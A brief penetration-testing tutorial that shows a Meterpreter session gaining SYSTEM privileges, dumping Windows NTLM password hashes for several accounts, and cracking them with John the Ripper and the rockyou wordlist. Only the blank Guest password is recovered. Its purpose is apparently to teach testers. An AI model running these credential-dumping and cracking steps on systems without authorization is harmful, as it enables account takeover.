The output of metasploit’s ‘hashdump’ can be fed directly to John to crack with format ‘nt’ or ‘nt2’. Let assume a running meterpreter session, by gaining system privileges then issuing ‘hashdump’ we can obtain a copy of all password hashes on the system:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::

Now we run John –

john ./pwlist.txt --format=nt --wordlist=/pentest/passwords/wordlists/rockyou.txt
Loaded 13 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
                 (Guest)
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

Unfortunately, we could only ‘crack’ the Guest account with it’s blank password – that won’t be much use. Better luck next time or try using a bigger wordlist!